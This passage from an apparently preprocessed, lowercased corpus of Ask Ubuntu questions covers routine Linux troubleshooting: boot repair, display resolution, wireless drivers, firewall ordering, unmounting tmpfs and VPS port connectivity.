20 5d 20 3a 20 00 00 09 ] : ... debug : rtmp_clientpacket , received : invoke 120 bytes debug : ( object begin ) debug : property : < name : no-name. , string : _error > debug : property : < name : no-name. , number : 1.00 > debug : property : null debug : property : < name : no-name. , object > debug : ( object begin ) debug : property : < name : level , string : error > debug : property : < name : code , string : netconnection.connect.rejected > debug : property : < name : description , string : [ accessmanager.reject ] : > debug : ( object end ) debug : ( object end ) debug : handleinvoke , server invoking < _error > error : rtmp server sent error debug2 : rtmp_readpacket : fd=5 debug2 : 0000 : 03 00 00 00 00 00 12 14 00 00 00 00 ... ... ... ... debug2 : 0000 : 02 00 05 63 6c 6f 73 65 00 00 00 00 00 00 00 00 ... close ... ... .. debug2 : 0010 : 00 05 .. debug : rtmp_clientpacket , received : invoke 18 bytes debug : ( object begin ) debug : property : < name : no-name. , string : close > debug : property : < name : no-name. , number : 0.00 > debug : property : null debug : ( object end ) debug : handleinvoke , server invoking < close > error : rtmp server requested close debug : closing connection .
249560	netflix-desktop no longer works after update	so a while ago i installed netflix-desktop on my ubuntu 12.10 installation . i am also a subscriber to redbox instant . i attempted to install redbox-desktop which is from the same ppa as the netflix-desktop . here is the link to the story about this http : //www.omgubuntu.co.uk/2013/01/how-to-watch-lovefilm-redbox-instant-or-netflix-on-ubuntu the only problem is that when i attempted to install it it updated netflix-desktop in the process . now when i click on netflix-desktop i wait and nothing happens . redbox-desktop no longer works either . i have tried uninstalling and reinstalling with the same result . please help i need me my doctor who ! edit : i also noticed that when i reinstalled netflix the silverlight and mozilla firefox ( the one ran through wine ) have disappeared . i am not sure if that is relevant
249563	device is busy error when trying to unmount tmpfs home area	i have been trying to get pam_mount to mount a tmpfs drive for domain users , so that it is volatile storage and is cleared on every logout . the problem i found was that although the area would mount fine , it would n't unmount again . checking in auth.log showed me that the umount command was saying device is busy . so i tried to manually unmount the device ( the user is logged out at this stage ) but the error was still persisting . however , lsof and fuser showed no files opened within the area . looking at some other related problems i also tried losetup to find any loopback devices , but there were none . the exact mount command i used was : mount -t tmpfs -o uid=1001 , gid=1001 , size=100m , mode=0700 none /home/user to cut a long story short , i have narrowed the cause down to something in x , the x session , xfce , lightdm login , or any other graphical apps . the problem does not manifest itself with virtual terminal logins , or if i do n't log in at all . unmounting only gives the error if i log in through the graphical login . and just to make it even more confusing , i tried the same test on my home arch system which also runs xfce . this time it worked flawlessly . system specs : ubuntu 12.04 , xfce desktop , lightdm with kde greeter , winbind authentication .
249565	how do i install the necessary debug packages to report tracebacks in kubuntu ?	i 've had many a kubuntu install , but across all of them , i 've had this problem . when kde crashes , i get the `` crash reporting assistant '' dialog that wants me to install debug symbols to get a full traceback . invariably , and this has been the case for a long time ( including and up to 12.10 ) , i get this error : no debug packages could be found for the files listed below . do you want to continue anyway ? the following files are listed : /usr/lib/libkdeui.so.5 /usr/lib/libsolid.so.4 /usr/lib/libkdecore.so.5 screenshot : this has been an issue in kubuntu for years . it happens on fresh installs , on old installs , on every kubuntu install i 've used since at least kde 4 came out , if not before . there seems to be no way , without these debug packages , to make useful bug reports , because without them , the assistant wo n't let you finish the report , and thus , bugs go unnoticed . i can not believe i 'm the only one noticing this . but i do n't see any solutions out there from google . i really want to help report bugs in kde . recommendations ?
249566	wrong mac address error in virtual console	error @ wl_cfg80211_get_station : wrong mac address this message continuously prints out on my virtual console . what does it mean , what is its cause and how would one fix it ?
249567	how do i change rhythmbox 's visible column order ?	how to change rhythmbox 's visible columns order instead of `` title - genre - artist - album '' to be `` title - artist - album - genre '' ?
249568	software for making mosaic image from a collection of images	i have a collection of images and an image that i want to generate from that collection . what software is there available for ubuntu for generating a mosaic image ? how to do it ?
249570	is the alcor au6371 card reader supported in 12.10 64bit ?	i have now spend several evenings searching this forum for an answer on how to get the internal card reader on my desktop working . it does not show up in any of the lists that terminal commands have produced and the various 'fixes ' that i have been able to attempt have not worked . a list of supported card readers has not been located , so purchasing an alternative may not work . the alcor data sheet for au6371 b51-jdl-gr indicates that it should work without an external driver , but does not mention linux . is there a solution ? sorry for slow response to the assistance , i got locked out and had to have my account recovered ! i tried putting an sd 128mb card into the reader prior to boot , but not visible in home folder ( nautilus ? ) . i also tried an sdhc 32gb with the same result . input-utils is installed medibuntu is a listed source tried alternative usb connectors on the asus motherboard , with no effect . have used terminal to run modprobe sg , modprobe sd_mod , modprobe usb_storage and modprobe scsi_mod with no effect noticed or reported . sg_scan -i in terminal gave , sg_scan : error opening /dev/sg0 : permission denied /dev/sg1 : scsi2 channel=0 id=0 lun=0 [ em ] pioneer dvd-rw dvr-217f 1.07 [ rmb=1 cmdq=0 pqual=0 pdev=0x5 ] lsusb and lspci in terminal do not list the internal card reader , or anything that might be it . i have also found 'getting started with ubuntu 12.10 ' , but that has not indicated what to try next . i have also found vendors with card readers based on the alcor au6370 that they advertise as linux compatible , but i have doubts . advise please .
249571	windows comfort mouse 4500 configuration	i just installed ubuntu after a long break and long hardship with windows 7 and i was wondering if anyone could answer my question of how to configure my two extra buttons on my microsoft comfort mouse 4500 ? on windows i normally used microsoft intellipoint . please and thank you for your time : ) using xev | grep button i get : state 0x10 , button 1 , same_screen yes state 0x110 , button 1 , same_screen yes state 0x10 , button 6 , same_screen yes state 0x10 , button 6 , same_screen yes state 0x10 , button 6 , same_screen yes state 0x10 , button 6 , same_screen yes state 0x10 , button 5 , same_screen yes state 0x1010 , button 5 , same_screen yes state 0x10 , button 3 , same_screen yes state 0x410 , button 3 , same_screen yes state 0x10 , button 9 , same_screen yes state 0x10 , button 9 , same_screen yes state 0x10 , button 8 , same_screen yes state 0x10 , button 8 , same_screen yes i 'd like to assign button 9 to do a middle click , as the middle clicking on my mouse does n't function properly .
249572	why do i see a screen showing all text i typed during the session on logging out ?	when i log off of ubuntu 12.10 , a screen appears shortly with all the text i typed during the session , including passwords and such . is this supposed to happen ? [ update ] the screen is fullscreen black with white text . i am running ubuntu as a guest os within vmware 5.0.1 on a windows 7 64bit system . i 'm not sure what software i installed other than google chrome and gnome 3 classic user interface .
249580	roxio wo n't let me burn ubuntu iso to usb drive	i 'm trying to burn ubuntu 12.10 to usb drive . i downloaded the ubuntu image fine and i want to burn it with roxio software . but when roxio opened up , it gave me only one option for burn the iso image on a cd/dvd . when i try to change that option , there is no other choice on the pull down menu meaning i have no idea how to get ubuntu to my usb drive . i 'm a very , very uneducated computer user and am using linux as a last resort to get old info off of my dead dell laptop so be gentle with me .
249587	can not install dbix : :class : :loader in order to make catalyst model dbic	i want to create model dbic for catalyst project with this command : myapp_create.pl model somedb dbic dbi : sqlite : /tmp/my.db this command does n't work since i have n't `` catalyst : :helper : :model : :dbic '' module . in order to install it i have to install dbix : :class : :loader # failed test 'use catalyst : :helper : :model : :dbic ; ' # at t/01use.t line 5 . # tried to use 'catalyst : :helper : :model : :dbic ' . # error : ca n't locate dbix/class/loader.pm in @ inc so when i try to install dbix : :class : :loader i get this error report : running make test perl_dl_nonlazy=1 /usr/bin/perl `` -mextutils : :command : :mm '' `` -e '' `` test_harness ( 0 , 'blib/lib ' , 'blib/arch ' ) '' t/*.t t/01use.t ... ... ... ... 1/3 important : dbix : :class : :db is deprecated and *will* be removed . do not use . t/01use.t ... ... ... ... ok t/02pod.t ... ... ... ... skipped : set test_pod to enable this test t/03podcoverage.t ... . skipped : test : :pod : :coverage 1.04 required t/10sqlite_common.t .. important : dbix : :class : :db is deprecated and *will* be removed . do not use . loader_test9 has no primary key at /home/michael/.cpan/build/dbix-class-loader-0.21-vh7k9u/blib/lib/dbix/class/loader.pm line 110. t/10sqlite_common.t .. 1/26 dbix : :class : :resultsetproxy : :find ( ) : find ( ) expects either a column/value hashref , or a list of values corresponding to the columns of the specified unique constraint 'primary ' at t/dbixcl_common_tests.pm line 73 # looks like you planned 26 tests but ran 5 . # looks like your test exited with 2 just after 5. t/10sqlite_common.t .. dubious , test returned 2 ( wstat 512 , 0x200 ) failed 21/26 subtests t/11mysql_common.t ... skipped : you need to set the mysql_name , mysql_user and mysql_pass environment variables t/12pg_common.t ... ... skipped : you need to set the pg_name , pg_user and pg_pass environment variables t/13db2_common.t ... .. skipped : you need to set the db2_name , db2_user and db2_pass environment variables test summary report -- -- -- -- -- -- -- -- -- - t/10sqlite_common.t ( wstat : 512 tests : 5 failed : 0 ) non-zero exit status : 2 parse errors : bad plan . you planned 26 tests but ran 5 . files=7 , tests=8 , 5 wallclock secs ( 0.05 usr 0.01 sys + 0.73 cusr 0.10 csys = 0.89 cpu ) result : fail failed 1/7 test programs . 0/8 subtests failed . make : *** [ test_dynamic ] error 255 blblack/dbix-class-loader-0.21.tar.gz /usr/bin/make test -- not ok //hint// to see the cpan-testers results for installing this module , try : reports blblack/dbix-class-loader-0.21.tar.gz running make install make test had returned bad status , wo n't install without force anyone can help me ?
249588	new to ubuntu using 12.10 having troube getting a second display to work	i am new to ubuntu so i do n't know any information to provide to help me , so let me kno what you need . when i am trying to connect to external display on my laptop , mirroring the display is hit or miss , sometime it will entirely except that launcher disappears . when i try to extend displays i get an error saying it can only support up to 2048x2048 pixels , is there any way to increase this limit , i know that when this laptop ran windows it could support higher resolutions than that . my laptop has a ati radeon x1250 video card . thanks for any help , and sorry for the lack of information .
249589	how to convert multiple files to mp3 in thunar custom actions ?	i have added a simple command avconv -i % f % f.mp3 to thunar 's custom actions to convert a selected media file to mp3 ( in the same folder and with the same name ) . what would be the command that can be added in the same way that would allow selecting multiple files or an entire folder to convert them to mp3 ( with the source 's folder and name ) ? i expect them to be converted one by one ( not in parallel , that is , not all at the same time ) - but i was wandering if that could be done with one context menu command after selecting multiple files . it looks like avconv does not support multiple files per input ( see comment under here ) , i am not asking necessarily for a command that includes avconv , but for any other solution .
249590	how do i disable ivtv ?	i 'm trying to debug ivtv and for this purpose i would like to know how to disable it . since the ivtv site is down i ca n't find any documentation to do this .
249592	server 12.04 machine does not respond to arp broadcasts	i just ssh 'd into my old netbook ( running as a cups server ) running ubuntu server 12.04 and did a dist-upgrade ( have n't done one in a while ) . upon rebooting the machine , i can now no longer access it remotely at all ! ssh does n't work , http does n't work ( cups web interface ) , i ca n't even make it respond to ping . however , the machine still appears to have full access to the network and the internet- it can , for example , wget my iis server on another machine in my network . i tested this by physically logging in at the machine . the only thing i could think of is some kind of firewall issue ( although i never set it up ) , so i did iptables -- list but there are no firewall rules at all and everything is set to accept . i 'm a bit stumped as to why my server is suddenly pretending to be invisible ! edit : i think i 've managed to get a bit closer to this- turns out , the machine is n't even responding to arp broadcasts . if i try and ping it and look at wireshark on the pinging machine , i see lots of `` who has 192.168.0.7 ( the netbook ) ? tell 192.168.0.26 '' with no reply . still at a loss as to why that would happen though ... edit edit : i ran tcpdump -nsvv arp on the netbook and tried to ping it from 192.168.0.26- did n't see anything , pings timed out . i then pinged 192.168.0.26 from the netbook , which succeeded , and i saw the arp messages in tcpdump . pinging the netbook from 192.168.0.26 again now works , because they already exchanged arp info- but attempting to access it from another machine ( my phone ) still fails . when pinging 192.168.0.26 from the netbook , it broadcasts an arp request to everyone , which 192.168.0.26 responds to . 192.168.0.26 then sends an arp request , to the netbook 's mac directly , which succeeds . what this therefore looks like is that the netbook is not responding to anything sent to a broadcast mac . it only responds to arp requests directed at it specifically . edit edit edit : seems to be exactly this probelm , same wireless driver and everything : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/414724
249594	how do i fix the mbr of a dual boot between ubuntu 12.10 and windows 7 ?	firstly , pardon the chaos . i have an ubuntu partition that i 've shrank in half to install windows . when i ran windows and rebooted after updates , there was no boot loader and it automatically chose windows . i used easybcd to configure the boot loader and add ubuntu to the list , but when i tried to boot ubuntu , i got a blinking white line in the top left corner of a black screen . i redownloaded easybcd , moved windows to the top of the list , rebooted and then the only boot option was ubuntu , the windows option did n't even appear . i used ubuntu to change from the windows boot manager to grub2 and none of the ways i 've researched to add windows to grub2 have worked for me . is my best option to just reinstall ubuntu ?
249596	i have error message connecting a monitor to my netbook	i want to connect my lenovo s205 netbook with a 1080p monitor , however the only way to get it to work is by mirroring the display . i would like to use the top display at 1080p . my attempts ended either in an error message not allowing me to perform the change or in a shrinked display , which had been 1080p , but smaller with a black border . when connecting the monitor using a vga cable everything works fine . i would love to solve this by using the amd proprietary driver , but hope to get it solved in any way . thanks for the nice edit , lucio . been a bit tired . here is the exact error message i receive , when aligning the monitor next to the laptop monitor : the selected configuration for displays could not be applied . required virtual size does not fit available size : requested= ( 3200 , 1080 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) . i may also mention that if i align the monitor above the laptop monitor it works , but i get a black border around it on the 1080p monitor . i changed the xorg.conf file , which allowed me to use both displays as wished , however now i still have to solve the problem with the black border on the 1080p monitor . the amd catalyst driver did n't help .
249597	boot issues with windows 8 after installing ubuntu , how to fix from terminal ?	i just put ubuntu 12.10 on my brand new laptop , and my display driver did not work correctly . when i tried to fix the driver by using a generic ati driver , the computer refused to boot to the desktop on ubuntu . it also wo n't let me boot to windows 8 , and gives two errors : error : ca n't find command 'drivemap ' and something about an invalid efi . i tried to get to windows by bypassing the boot in bios , but it booted and a sad-face ( literally ) came up on windows for a split second and said `` sorry , windows has to reboot ... '' and then reboots to the startup screen that asks which os to use . when i send ubuntu into recovery mode , to do anything , it tells me i have to change to read/write mode and then locks up when i said yes . i had to cold shut down . please help . i can get to the terminal in ubuntu but that is all . how can i remove ubuntu from my laptop so i can use it again ?
249598	why does `sudo passwd root` reset my root password ? is this a security risk ?	both in my ubuntu desktop host and virtual machine . i have't login as root for about a month , during which i upgraded the kernel . i found my root password does n't work anymore . however , by using sudo passwd root , i can easily reset the root password by current user password . how could this happen ? i do n't have a problem anymore , just curious about the underline reason for this . thank you !
249599	how to check the required dependencies for a package ?	i want to install the ndiswrapper packages ( utils , -dkms and -common ) in my ubuntu 13.04 live-usb . however , since i do n't have wi-fi while i 'm on the daily build , i ca n't install them directly , so i have to return to my default 12.10 installation to download the appropriate packages and dependencies . the package dependencies are listed here : http : //packages.ubuntu.com/raring/ndiswrapper-common http : //packages.ubuntu.com/raring/ndiswrapper-dkms http : //packages.ubuntu.com/raring/ndiswrapper-utils-1.9 though -common and -utils have relatively few dependencies , -dkms has quite a few , and most of these have their own dependencies . i also realize that many of these dependencies are installed by default in 13.04 . so i was wondering if there is some way to quickly determine only the packages i would actually need to download and install to get ndiswrapper working in 13.04 . something like a simulation of an `` apt-get install '' in 13.04 that would output all the missing packages for a default installation . thanks !
249600	can i symlink a dropbox folder ?	i 've just installed ubuntu 12.10 as a dual boot with windows 8 . i 'd already had windows up and running for a few months before installing ubuntu , so in order to have my files accessible from both os 's , i have the windows partition automatically mounted , and the folders in /home symlinked to their windows counterparts . this is working really well except for my dropbox folder . the dropbox folder created by the windows side is accessible by the linux side , but obviously it does n't sync any more . the same problem arises the other way round . can anyone think of a way around this , to get both sides syncing the same data ? is it possible to point dropbox to a pre-existing folder instead of having it create a new folder ? thanks
249606	server setup for multi-site development web server with multiple contractors logging in ?	while i 've been using linux for many years as a desktop os i 'm still a novice at the more serious server admin stuff . basically i 'm looking for a best practices that covers : hosting many domains ( i 'm doing this now , but i just muddled though without really knowing what i was doing , if there 's a `` right '' way to do this i doubt i 'm doing it ) granting access to outsiders without letting them access all websites , just the ones they are working on . ( i have been trying to use facl but the mask keeps getting reset , so the contractors keep losing write permissions to directories , obviously i 'm either doing something wrong or are barking up the wrong tree entirely )
249616	how to load firewall before network ?	how can i ensure iptables gets up before any network adapter gets up ? and can network be stopped to be brought up if there is an error in the firewall rules ? for exiting and future network adapters . with existing i mean adapters i am right now are of ( ex : cabled network adapter ) . but if i add another adapter later ( 3g , wifi , whatever ) , i want them to be protected by the firewall without thinking about it . and no . using /etc/rc.local is not very safe . network could get up before rc.local was run .
249617	ubuntu taking forever to boot off of usb flash drive	so i just built a pc , and tried to boot ubuntu off of a usb flash drive . it has been at the purple ubuntu screen with the loading dots for over 30 minutes , what should i do ?
249618	ubuntu terminal colouring	i got this snippet of code from @ mdo ( http : //markdotto.com ) and optimized it to ubuntu . but now when i type something and erase with backspace , the whole line is erased . i do n't know too much of bash and stuff , so you can help me ? ps1='\ [ \e [ 0 ; 35mâ\e [ m \e [ 0 ; 36m\w/\e [ m \e [ 0 ; 33m`git branch 2 > /dev/null | grep -e ^* | sed -e s/^\\\\\*\ \ ( .+\ ) $ /\ ( \\\\\1\ ) \ /`\e [ m\ ] ' the problem is basically when doing backspaces and erasing entire line .
249620	how to replace carl9170 with ar9170 ?	i have a d-link dwa-160 wireless adapter , and the current driver ( carl9170 ) has some really , really , really frustrating bugs . ( well , just one , but it 's a real showstopper . ) whenever i 'm in puppy linux , this bug does n't occur . the difference is , puppy linux says it 's using ar9170 . i 'd like to use that for ubuntu and see if it works better there , as well . i 'd like to know the exact procedure for doing this .
249623	can i save the command output to a file other than text-files ?	i do n't even know if it is possible . i 've been trying to find an answer , and could n't so i turn to everyone here for help ! ( in the event that it is possible . ) i know it is possible to save the command output to a text file and i have no issue with that . however , i really love how it comes out in the terminal , all nicely color coded and neatly organized . but it does n't come out so pretty in a text file and things are harder to find . to show you all what i was doing : ls -r /media/ai/walkman/music that way i could list all the files that are in the folder as well as the contents of the folders within . ( i have inside of all these band folders ( within alphabetical folders ) are songs . i 've got 2000+ and would like a list because i 've noticed i have some repeats scattered . ) everything comes out nice and color coded in the terminal . but when you do : ls -r /media/ai/walkman/music > filename.txt that 's just a plain textfile and while things are listed , it is a very long list and very hard to skim through . so i was wondering if it were possible to have the output saved either in an html/xml document or a table so it 'd be easier to pilfer through the tremendous list ?
249626	how to get crysis 2 running	i am runnung ubuntu 12.04 64bit with nvidea gtx660 the with proprietary driver version 310 installed via additional drivers i have tried a variety of things having no succsess i have got past the initial padlocked room , but everything was black i could see the objective marker , and the gui with the map thing i would like to know the ubuntu version and bit ( 32 64 ) wine version and bit ( 32 64 ) any patches winetricks ( install order ) if known install method , iso , steam , etc this is for crysis2
249628	empathy menu is not persistent	i have been experiencing an on-going issue with empathy 's menu . if i open empathy after i boot my box , the empathy menu appears normally . once i close empathy and reopen it later , the menu has either disappeared or is there with limited options . the empathy menu returns for one shot only after every reboot , then it disappears again . initially this was happening on ubuntu 12.10 upgraded from 12.04 and with gnome shell installed over unity . i suspected that unity 's global menu implementation may have been causing issues even though i uninstalled it , so i did a clean install of ubuntu 12.10 gnome-remix . the problem still exists on a clean install of gnome shell with no extensions installed or enabled . the attached screenshot shows what i mean , except i have added some extensions and changed gnome shell theme . the original problem still remains . i have tried running empathy in debug mode , but i do n't have any critical or error messages ; the only warning messages say `` ignoring length property that is n't a number '' . i am at a loss as to what to do next except to file a bug report . has anyone here experienced the same thing , and if so is there a solution ?
249631	brightness with amd/intel open source drivers ubuntu 12.10	i have an issue with the screen brightness of my computer . i have a dell inspiron 7520 . i have a amd radeon hd 7730m 2gb with a intel hd 4000 , i am currently using the kernel lastest kernel from x-edgers i believe . 3.7 something like that . anyways , this is n't the problem . i 'm sure there 's a way to change the level of brightness from the terminal , or even just change the range , cause it looks the be range that is n't enough . in fact , when i try to lower the brightness , it drops but slightly but it does n't go lower on the bar . if i want to make the screen go brighter , well it ca n't because it is at the max .
249632	how can i insert an apa style bibliography in a document using libreoffice ?	i 'm a college student and my teachers ask me to insert apa bibliographies in all of my works . i have n't found any site which has a clear explanation . i 've seen this video : https : //www.youtube.com/watch ? v=hejtmtezjd8 but what i really want to do is this : is there some kind of counterpart to microsoft office reference manager ? thanks for your answers .
249633	what did i do wrong ? why is n't ubuntu loading ?	something went wrong when i installed ubuntu onto my dell inspiron laptop , preloaded with windows 8 . i installed ubuntu 12.10 with wubi , and then restarted my computer . when it restarted , i got an error message that said `` windows failed to start . '' it said that the some of the files were missing , and gave me error code 0xc0007b . i tried turning off the uefi and secure boot thing that windows 8 has , and i do n't know where to go from here . any help would be appreciated . thanks !
249635	screen resolution and ati hd6850 drivers ubuntu 12.10	i am running dual monitors with an sapphire hd6850 graphics card . my main monitor a 22 '' flat screen plugged in with a dvi port gets full 1680 x 1080 resolution . my second monitor is stuck at 1024 x 768 and is fairly blurry when in windows it can be up to 1280 x 960 . how can i increase screen resolution and fix the blurriness . im running ubuntu 12.10 i never figured out how to install the ati catalyst control ether . when i did put in ati proprietary drivers the menu bar would not appear . please help !
249638	i am stuck on step 8 of creating a usb boot disk mac style	i coverted the file from iso to dmg . i tried to step 8 i get this message . dd : /desktop/2ubuntu-12.10-desktop-amd64.dmgof=/dev/rdisk1s1 : no such file or directory over and over again . i try to retrace the the ubuntu dmg file and i find it on my desktop . what is going on . i am running macbook 6 1 with mountain lion as the os . i have a flash drive that is 4gb formarted to fat32
249639	can not establish tcp connection with vps	vince stewart i have a vps on ubuntu 12 and a home computer on ubuntu 12 . i have a java application on the vps which opens a tcp socket listening on port 4000 and also an http listener . my ssh service operates on port 55555 . once the application has been started i get a this report when i enter on the command line : netstat -t -l active internet connections ( only servers ) proto recv-q send-q local address foreign address state tcp 0 0 *:55555 * : * listen tcp6 0 0 [ : : ] : http-alt [ : : ] : * listen tcp6 0 0 [ : : ] :55555 [ : : ] : * listen tcp6 0 0 vps.mdomai.com:4000 [ : : ] : * listen with denyhosts operating my /etc/hosts.allow is just one line all : xxx.xxx.xxx.xxx ( xxx.xxx.xxx.xxx is my static home ip address ) /etc/hosts.deny is : all : all i can connect from home using : telnet yyy.yyy.yyy.yyy 55555 or telnet yyy.yyy.yyy.yyy 8080 ( yyy.yyy.yyy.yyy is for my vps address ) but with : telnet yyy.yyy.yyy.yyy 4000 an error is thrown ( `` unable to connect to remote host : connection refused '' ) . this seems like a firewall issue . i am pretty sure i have not changed iptables so should be vps default . many thanks for any suggestions . when i issue sudo ufw raw , i get : ipv4 ( raw ) : chain input ( policy accept 21043 packets , 2314421 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 21077 packets , 2152970 bytes ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 318 packets , 41345 bytes ) pkts bytes target prot opt in out source destination chain input ( policy accept 42 packets , 7128 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 347 packets , 24571 bytes ) pkts bytes target prot opt in out source destination chain postrouting ( policy accept 347 packets , 24571 bytes ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 6241 packets , 691583 bytes ) pkts bytes target prot opt in out source destination chain input ( policy accept 5965 packets , 657366 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 5936 packets , 614188 bytes ) pkts bytes target prot opt in out source destination chain postrouting ( policy accept 10872 packets , 1131008 bytes ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 6241 packets , 691583 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 5936 packets , 614188 bytes ) pkts bytes target prot opt in out source destination ipv6 : chain input ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain input ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain postrouting ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination
249642	gpt partition table warning message during install of ubuntu	/dev/sda contains gpt signatures indicating that it has a gpt table . however , it has a fake msdos partition table as it should . perhaps it was corrupted ? is this a gpt partition table ? so , that 's the error message and this is during my first os install of ubuntu . can close the message box . ca n't click yes and ca n't click no . what do i do ?
249643	zenity alternative for bash scripts in package sources ?	zenity is a bit too limited for my use cases . what are the alternatives ? must be inside package sources . must be useable from within bash scripts .
249655	how can i use usb wireless adaptor ( rt3070 ) as access point ?	i have a problem of setting access point with an usb wireless adaptor ( rt3070 ) on linux 2.6 . i tried the following steps , but i still can not find any access point from my iphone and ipad . where is wrong ? step 0 . confirm environment environment is ubuntu 10.04 lts . $ lsusb bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0411:01ee melco. , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub $ uname -r 2.6.32-38-generic step 1 . download linux driver download the following driver from http : //www.mediatek.com/ 2011_0719_rt3070_rt3370_rt5370_rt5372_linux_sta_v2.5.0.3_dpo.bz2 step 2 . modify rtusb_dev_id.c i added the following line to common/rtusb_dev_id.c { usb_device ( 0x0411,0x01ee ) } , /* buffalo wli-uc-gnm2 */ # endif /* rt3070 */ step 3 . modify config.mk also i changed the setting in os/linux/config.mk # support wpa_supplicant has_wpa_supplicant=y # support native wpasupplicant for network maganger has_native_wpa_supplicant_support=y step 4 . copy rt2870sta.dat $ sudo cp rt2870sta.dat /etc/wireless/rt2870sta/rt2870sta.dat step 5 . build driver and install it $ sudo make $ sudo make install go to os/linux/ directory . $ sudo insmod rt5370sta.ko $ lsmod | grep rt rt5370sta 717049 0 gameport 9089 1 snd_ens1371 parport_pc 25962 1 agpgart 31724 1 intel_agp parport 32635 3 ppdev , parport_pc , lp scsi_transport_spi 21096 1 mptspi step 6. enable adapter insert my usb wireless adaptor ( buffalo wli-uc-gnm2 ) . $ ifconfig -a ra0 link encap : ethernet hwaddr 10:6f:3f:46 : ea:02 inet6 addr : fe80 : :126f:3fff : fe46 : ea02/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) $ sudo ifconfig ra0 up $ iwconfig ra0 ralink sta essid : '' 11n-ap '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate:1 mb/s rts thr : off fragment thr : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 step 7 . attempt to scan access points try to make wireless adapter work as wifi client to scan wifi access point . $ sudo iwconfig ra0 mode monitor $ iwconfig ra0 ralink sta essid : '' '' nickname : '' rt2870sta '' mode : monitor frequency=2.412 ghz access point : 7a:43:85 : d5:62:85 bit rate=150 mb/s rts thr : off fragment thr : off link quality=100/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 $ iwlist scan ra0 scan completed : cell 01 - address : 00:19 : c8:04 : xx : xx protocol:802.11b/g/n essid : '' xxxxxxxxxxxxxx '' mode : managed frequency:2.412 ghz ( channel 1 ) quality=52/100 signal level=-69 dbm noise level=-92 dbm encryption key : on bit rates:54 mb/s ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : dd0e0050f204104a0001101044000102 cell 02 - address : 9c : d2:4b : b6 : xx : xx protocol:802.11b/g essid : '' 007z_xxxxxxxxxxx '' mode : managed frequency:2.412 ghz ( channel 1 ) quality=100/100 signal level=-27 dbm noise level=-92 dbm encryption key : on bit rates:54 mb/s ie : unknown : dd0e0050f204104a0001101044000102 step 8 . try to make adapter work as access point ( failed ) $ sudo iwconfig ra0 mode managed $ sudo iwconfig ra0 ap 7a:43:85 : d5:62:85 $ sudo iwconfig ra0 key open now check available wifi access points with iphone and ipad . no access point `` 11n-ap '' found . $ iwconfig ra0 ralink sta essid : '' 11n-ap '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz access point : 7a:43:85 : d5:62:85 bit rate=1 mb/s rts thr : off fragment thr : off link quality=100/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 $ dmesg [ 5568.409472 ] # [ 5568.492660 ] ( efuse for 3062/3562/3572 ) size=0x2d [ 2d0-2fc ] [ 5572.655589 ] rtmp_timerlistadd : add timer obj e0a7fa34 ! [ 5572.655661 ] rtmp_timerlistadd : add timer obj e0a7fa78 ! [ 5572.655701 ] rtmp_timerlistadd : add timer obj e0a7fabc ! [ 5572.655709 ] rtmp_timerlistadd : add timer obj e0a7f9f0 ! [ 5572.655713 ] rtmp_timerlistadd : add timer obj e0a7f924 ! [ 5572.655716 ] rtmp_timerlistadd : add timer obj e0a7f968 ! [ 5572.655719 ] rtmp_timerlistadd : add timer obj e0a4a50c ! [ 5572.655722 ] rtmp_timerlistadd : add timer obj e0a39de4 ! [ 5572.655725 ] rtmp_timerlistadd : add timer obj e0a39e30 ! [ 5572.655728 ] rtmp_timerlistadd : add timer obj e0a4a5ec ! [ 5572.655731 ] rtmp_timerlistadd : add timer obj e0a4a484 ! [ 5572.655735 ] rtmp_timerlistadd : add timer obj e0a4a5a4 ! [ 5572.687769 ] -- > rtusbvenderreset [ 5572.689754 ] < -- rtusbvenderreset [ 5580.819692 ] cfgsetcountryregion ( ) : countryregion in eeprom was programmed [ 5580.819733 ] cfgsetcountryregion ( ) : countryregion in eeprom was programmed [ 5580.821541 ] key1str is invalid key length ( 0 ) or type ( 0 ) [ 5580.821588 ] key2str is invalid key length ( 0 ) or type ( 0 ) [ 5580.821633 ] key3str is invalid key length ( 0 ) or 